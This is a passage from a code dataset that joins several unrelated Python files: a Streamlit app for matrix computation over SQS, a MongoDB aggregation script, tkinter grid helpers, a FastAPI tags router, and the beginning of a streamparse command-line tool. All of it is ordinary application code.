messages:\n number_receive += 1\n processMessage(message.body, final_matrix, isMultiplication)\n message.delete()\n\n\n###################################################################################\n\nqueue_receive = initSQS('matrixQueueWtoM')\nqueue_send = initSQS('matrixQueueMtoW')\n\n# ############################ Interface ############################################\nst.title(\"Matrices Computation App\")\nst.subheader(\"Select the computation\")\n\ntype = st.radio(\n \"Computation: \",\n ('Addition', 'Multiplication'))\n\nst.subheader(\"Select the size of the matrices\")\n\nisMultiplication = False\n\nif type == 'Addition':\n isMultiplication = False\n number_row_m1 = st.number_input('Number of rows and column matrices', min_value=0)\n number_row_m2 = number_row_m1\n number_column_m1 = number_row_m1\n number_column_m2 = number_row_m1\nelse:\n isMultiplication = True\n col11, col12 = st.columns(2)\n with col11:\n number_row_m1 = st.number_input('Number of rows in the first matrix', min_value=0)\n number_column_m1 = st.number_input('Number of column in the first matrix', min_value=0)\n with col12:\n number_row_m2 = st.number_input('Number of rows in the second matrix', min_value=0)\n number_column_m2 = st.number_input('Number of column in the second matrix', min_value=0)\n\nst.subheader(\"Select the of element per submatrices\")\nsubmatrix_element_number = st.number_input('Number of element', min_value=0, max_value=30000)\n\n########################################################################################\ndef runComputation():\n\n if isMultiplication == False:\n M1 = np.random.randint(100, size=(number_row_m1, number_column_m1))\n M2 = np.random.randint(100, size=(number_row_m2, number_column_m2))\n\n if isMultiplication:\n if number_column_m1 != number_row_m2:\n st.error(\n 'The number of column for the first matrix need to be identical to the number of row of the second matrix.',\n icon=\"🚨\")\n else:\n M1 = np.random.randint(100, size=(number_row_m1, number_column_m1))\n M2 = np.random.randint(100, size=(number_row_m2, number_column_m2))\n\n col21, col22 = st.columns(2)\n with col21:\n st.subheader(\"Matrix 1:\")\n st.text(str(M1))\n with col22:\n st.subheader(\"Matrix 2:\")\n st.text(str(M2))\n\n col31, col32 = st.columns(2)\n with col31:\n st.subheader(\"Serial processing result:\")\n\n with st.spinner('Wait for processing...'):\n time_1 = time.time()\n\n if isMultiplication:\n st.text(str(np.dot(M1, M2)))\n else:\n st.text(str(M1 + M2))\n\n st.text(\"Execution time : \")\n st.text(str((time.time() - time_1)))\n st.success('Done!')\n\n with col32:\n 
st.subheader(\"Parallel processing result:\")\n\n time_2 = time.time()\n\n if isMultiplication:\n # Transpose of M2\n M2 = np.transpose(M2)\n # Necessary to replace the byte in good order\n M2 = M2.tolist()\n M2 = np.array(M2)\n\n M1 = M1.astype('int8')\n M2 = M2.astype('int8')\n\n padding11, padding12, M1 = devideMatrix(M1, submatrix_element_number)\n padding21, padding22, M2 = devideMatrix(M2, submatrix_element_number)\n\n total_to_receive = getTotalToReceive(M1, M2, isMultiplication)\n\n manager = Manager()\n string_placeholder1 = manager.Value(c_char_p, \"\")\n\n with st.spinner('Send paquet'):\n placeholder1 = st.empty()\n process1 = mp.Process(target=sendMatrix, args=(M1, M2, total_to_receive, isMultiplication, string_placeholder1))\n process1.start()\n st.success('Done!')\n\n final_matrix = np.zeros([M1.shape[0], M2.shape[0], M1.shape[2], M1.shape[2]], dtype=int)\n\n shm = shared_memory.SharedMemory(create=True, size=final_matrix.nbytes)\n # Now create a NumPy array backed by shared memory\n final_matrix_buffer = np.ndarray(final_matrix.shape, dtype=final_matrix.dtype, buffer=shm.buf)\n final_matrix_buffer[:] = final_matrix[:] # Copy the original data into shared memory\n\n string_placeholder2 = manager.Value(c_char_p, \"\")\n\n with st.spinner('Receive paquet'):\n placeholder2 = st.empty()\n process2 = mp.Process(target=receiveMatrix, args=(total_to_receive, final_matrix_buffer, isMultiplication, string_placeholder2))\n process2.start()\n st.success('Done!')\n\n while process1.is_alive() or process2.is_alive():\n placeholder1.text(string_placeholder1.value)\n placeholder2.text(string_placeholder2.value)\n\n process1.join()\n process2.join()\n\n final_matrix[:] = final_matrix_buffer[:]\n\n # Clean up from within the first Python shell\n del final_matrix_buffer # Unnecessary; merely emphasizing the array is no longer used\n shm.close()\n shm.unlink() # Free and release the shared memory block at the very end\n\n final_matrix = np.concatenate(final_matrix, axis=1)\n final_matrix = np.concatenate(final_matrix, axis=1)\n final_matrix = final_matrix[:number_row_m1, :number_column_m2]\n st.text(str(final_matrix))\n\n st.text(\"Execution time : \")\n st.text(str((time.time() - time_2)))\n\nif st.button('Start'):\n runComputation()\n","repo_name":"anthopit/Matrices_Multiplication_CloudApp","sub_path":"script/appStreamLit.py","file_name":"appStreamLit.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26151968768","text":"import json\r\nimport pymongo\r\nimport time\r\n\r\n\r\nclass Record:\r\n def __init__(self, subcategory, avg_income, views_td, views_all):\r\n self.subcategory = subcategory\r\n self.avg_income = avg_income\r\n self.views_td = views_td\r\n self.views_all = views_all\r\n self.last_updated = time.ctime(time.time())\r\n\r\n\r\nclass DataToCalc:\r\n a = 0\r\n\r\n def __init__(self, subcategory, avg_income, views1, views2):\r\n self.subcategory = subcategory\r\n self.avg_income = avg_income\r\n self.views1 = views1\r\n self.views2 = views2\r\n self.a = 1\r\n\r\n def update(self, avg_income, v1, v2):\r\n self.avg_income += avg_income\r\n self.views1 += v1\r\n self.views2 += v2\r\n self.a += 1\r\n\r\n def calculate_avg(self):\r\n self.avg_income = round(self.avg_income / self.a)\r\n\r\n\r\ndef create_record(data):\r\n col2.insert_one(data)\r\n\r\n\r\ndef update_records(data):\r\n for i in data:\r\n query = {\"subcategory\": i[\"subcategory\"]}\r\n values = {\"$set\": 
{\"avg_income\": i[\"avg_income\"], \"views_td\": i[\"views_td\"],\r\n \"views_all\": i[\"views_all\"], \"last_updated\": i[\"last_updated\"]}}\r\n\r\n col2.update_one(query, values)\r\n\r\n\r\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\ndb = client[\"PBL\"]\r\ncol1 = db[\"Subcategories\"]\r\ncol2 = db[\"Main\"]\r\n\r\nfile = open('jobs.json')\r\ndata = json.load(file)\r\n\r\nrecords = []\r\nnums = []\r\ncategories = []\r\ncat = {}\r\nrec = {}\r\ni = 0\r\n\r\n\r\nfor i in data:\r\n t = 0\r\n\r\n for j in nums:\r\n if j.subcategory == i[\"subcategory\"]:\r\n t = 1\r\n break\r\n\r\n money = i[\"priceValue\"]\r\n\r\n if i[\"priceCurrency\"] != \"lei\":\r\n money = money * 19\r\n\r\n if t == 0:\r\n inc = DataToCalc(i[\"subcategory\"], money, i[\"viewsToday\"], i[\"viewsAll\"])\r\n nums.append(inc)\r\n\r\n elif t == 1:\r\n for j in nums:\r\n if j.subcategory == i[\"subcategory\"]:\r\n j.update(money, i[\"viewsToday\"], i[\"viewsAll\"])\r\n break\r\n\r\nx = col1.find()\r\n\r\nfor i in x:\r\n cat = {\"name\": i[\"name\"], \"id\": i[\"id\"]}\r\n categories.append(cat)\r\n\r\nfor j in nums:\r\n t = 0\r\n j.calculate_avg()\r\n\r\n for i in categories:\r\n if i[\"name\"] == j.subcategory:\r\n rec = Record(i[\"id\"], j.avg_income, j.views1, j.views2).__dict__\r\n\r\n x = col2.find()\r\n\r\n for i in x:\r\n if i[\"subcategory\"] == rec[\"subcategory\"]:\r\n records.append(rec)\r\n t = 1\r\n break\r\n\r\n if t == 0:\r\n create_record(rec)\r\n\r\nupdate_records(records)\r\n","repo_name":"prenaissance/sem2pbl2022","sub_path":"db/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24238270528","text":"import tkinter.ttk as ttk\nimport tkinter as tk\n\n\ndef build_components(parent):\n \"\"\"docstring\"\"\"\n\n components = {}\n\n header = ttk.Frame(parent)\n header.grid(row=0, column=0, columnspan=3, pady=10, sticky='')\n components['header'] = header\n\n left = ttk.Frame(parent)\n left.grid(row=1, column=0, padx=10, sticky='')\n components['left'] = left\n mid = ttk.Frame(parent)\n mid.grid(row=1, column=1, padx=10, sticky='')\n components['mid'] = mid\n right = ttk.Frame(parent)\n right.grid(row=1, column=2, padx=10, sticky='')\n components['right'] = right\n\n footer = ttk.Frame(parent)\n footer.grid(row=2, column=0, columnspan=3, pady=10, sticky='')\n components['footer'] = footer\n\n center(parent)\n return components \n\ndef center(parent):\n rows, columns = parent.grid_size()\n for i in range(columns):\n parent.grid_columnconfigure(i, weight=1) \n for i in range(rows):\n parent.grid_rowconfigure(i, weight=1) \n\n\ndef vgrid(parent, depth=1, **kwargs):\n for i, widget in enumerate(parent.winfo_children()):\n widget.grid(row=i // depth, column=i % depth, sticky='', **kwargs)\n center(parent)\n\n\ndef hgrid(parent, depth=1, **kwargs):\n for i, widget in enumerate(parent.winfo_children()):\n widget.grid(row=i % depth, column=i // depth, sticky='', **kwargs)\n center(parent)\n\n\ndef display(entry, value=\"\"):\n \"\"\"delete entry contents and insert value\"\"\"\n\n entry.delete(0, \"end\")\n entry.insert(0, value)\n\n","repo_name":"mhyatt000/AR4","sub_path":"general/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36053022181","text":"import funcy\nfrom databases.interfaces import Record\nfrom fastapi import 
+{"seq_id":"36053022181","text":"import funcy\nfrom databases.interfaces import Record\nfrom fastapi import APIRouter, status\nfrom sqlalchemy import select\n\nfrom api.exceptions import NotFound\nfrom app.database import database\nfrom models import Tag\nfrom schemas.tags import CreateTagRequest, TagResponse, UpdateTagRequest\nfrom services.exceptions import DoesNotExist\nfrom services.tags import create_one_tag, delete_one_tag, get_one_tag, update_one_tag\n\nrouter = APIRouter()\n\n\n@router.get('/tags/', tags=['tasks'], response_model=list[TagResponse])\nasync def read_tags_list() -> list[Record]:\n    query = select(Tag)\n    tags = await database.fetch_all(query)\n    return tags\n\n\n@router.get('/tags/{pk}/', tags=['tasks'], response_model=TagResponse)\nasync def read_tag(pk: int) -> Record:\n    with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n        tag: Record = await get_one_tag(pk=pk)\n    return tag\n\n\n@router.post(\n    '/tags/',\n    tags=['tasks'],\n    response_model=TagResponse,\n    status_code=status.HTTP_201_CREATED,\n)\nasync def create_tag(request: CreateTagRequest) -> Record:\n    tag: Record = await create_one_tag(data=request.dict())\n    return tag\n\n\n@router.put('/tags/{pk}/', tags=['tasks'], response_model=TagResponse)\nasync def update_tag(pk: int, request: UpdateTagRequest) -> Record:\n    update_data = request.dict(exclude_unset=True)\n\n    with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n        tag: Record = await update_one_tag(pk=pk, data=update_data)\n\n    return tag\n\n\n@router.delete('/tags/{pk}/', tags=['tasks'], status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_tag(pk: int) -> None:\n    with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n        await delete_one_tag(pk=pk)\n","repo_name":"korostil/todo","sub_path":"backend/api/private/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38207230665","text":"from docopt import docopt\n\nfrom ext.fabric import *\nfrom ext.invoke import *\nfrom bootstrap import quickstart\n\n\n# XXX: these are commands we're working on still\nTODO_CMDS = \"\"\"\n    sparse debug [-e ]\n    sparse restart [-e ]\n    sparse attach [-e ]\n    sparse logs [-e ]\n\"\"\"\n\n\ndef main():\n    \"\"\"sparse: manage streamparse clusters.\n\n    sparse provides a front-end to streamparse, a framework for creating Python\n    projects for running, debugging, and submitting computation topologies\n    against real-time streams, using Apache Storm.\n\n    It requires java and lein (the Clojure build tool) to be on your $PATH, and\n    uses lein and Clojure under the hood for JVM/Thrift interop.\n\n    Usage:\n        sparse quickstart \n        sparse run [-n ] [-t
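The last record is cut off mid-usage string. As an aside (not a reconstruction of the missing text), this is how a docopt usage block of that shape dispatches subcommands; the command and option names below are illustrative only:

```python
from docopt import docopt

USAGE = """demo: toy command dispatcher.

Usage:
    demo quickstart <project_name>
    demo run [-e <env>]

Options:
    -e <env>    Environment name [default: local].
"""


def main():
    args = docopt(USAGE)  # parses sys.argv[1:] against the Usage: section
    if args['quickstart']:
        print('scaffolding', args['<project_name>'])
    elif args['run']:
        print('running against', args['-e'])


if __name__ == '__main__':
    main()
```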